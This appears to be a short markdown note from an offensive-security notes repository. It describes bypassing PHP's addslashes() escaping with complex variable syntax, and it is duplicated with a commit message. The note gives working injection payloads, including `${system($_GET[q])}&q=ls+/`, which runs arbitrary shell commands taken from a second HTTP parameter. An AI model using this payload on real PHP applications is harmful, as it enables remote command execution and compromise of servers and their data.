killchain-compendium/Exploits/Web/PHP addslashes Bypass.md

# Bypass addslashes()

The function `addslashes()` can be bypassed by using complex variables like `${VARIABLE}`, for example `${phpinfo()}` or using a second HTTP parameter for input via
```sh
${system($_GET[q])}&q=ls+/
```
* https://www.programmersought.com/article/30723400042/
added addslashes bypass 2023-02-16 23:15:47 +01:00			`# Bypass addslashes()`

			The function `addslashes()` can be bypassed by using complex variables like `${VARIABLE}`, for example `${phpinfo()}` or using a second HTTP parameter for input via
			```sh
			`${system($_GET[q])}&q=ls+/`
			```
			`* https://www.programmersought.com/article/30723400042/`